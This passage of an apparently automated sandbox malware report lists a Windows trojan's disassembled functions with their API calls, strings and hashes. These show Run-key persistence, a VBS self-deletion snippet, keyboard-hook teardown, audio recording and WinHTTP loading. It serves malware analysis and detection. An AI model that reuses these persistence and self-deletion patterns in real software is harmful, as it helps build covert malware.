                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                                                                                                                                                                                                              • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                                                                                                                                                                                                              • API String ID: 4250697656-2665858469
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5133c671d710cab99362e97a646b3b1ba50623744ead630c68d077b4737750d1
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5133c671d710cab99362e97a646b3b1ba50623744ead630c68d077b4737750d1
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                                                                                                                                                                                                                              Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                                                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                                                                                                                                              • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                                                                                                                                                                                              • API String ID: 1861856835-3168347843
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 44f67282e739eeeaecd7b98bee20d2130426973c535ae0ed412f808c5b449250
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44f67282e739eeeaecd7b98bee20d2130426973c535ae0ed412f808c5b449250
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                                                                                                                                                                                                                                                                                                                              Function 0041A1CB Relevance: 42.2, APIs: 12, Strings: 12, Instructions: 180synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                                                                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32 ref: 0041A39A
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 0041A3BB
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                                                                                                                                                                                                                                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                                                                                                                                                              • String ID: alias audio$" type $TUF$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 738084811-2745919808
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 94bde5182454edb9779fbb2972f0ac70c4d1530fe6c04ab16a1576c090f81020
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94bde5182454edb9779fbb2972f0ac70c4d1530fe6c04ab16a1576c090f81020
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                                                                                                                                                                                                                                                                                              Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                                                                                                                                              • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                                                                                                                                                                                              • API String ID: 3797177996-1998216422
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a4b6625aa9a17ef35eace377775325a7502576c59292764048c404f14cb14ba2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4b6625aa9a17ef35eace377775325a7502576c59292764048c404f14cb14ba2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                                                                                                                                                                                                                                                                                                                              Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Write$Create
                                                                                                                                                                                                                                                                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                                                                                                                                                              • API String ID: 1602526932-4212202414
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                                                                                                                                                                                                                              Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000001,004068B2,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                                                                                                                                                              • API String ID: 1646373207-3059492839
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                                                                                                                                                                                                                              Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                                                                                                                                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                                                                                                                                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                                                                                                                                                                              • String ID: 6$C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$del$open$BG$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 1579085052-100507993
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d53b22d1013cbac7cb939b755385df34ddb64fa618ff04238cb7624026cf26e1
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d53b22d1013cbac7cb939b755385df34ddb64fa618ff04238cb7624026cf26e1
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                                                                                                                                                                                                                              Function 10007310 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(winhttp.dll,?,10002B6F), ref: 10007316
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 10007333
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 10007340
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 1000734D
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 1000735A
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 10007367
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 10007374
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 10007381
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 1000738E
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
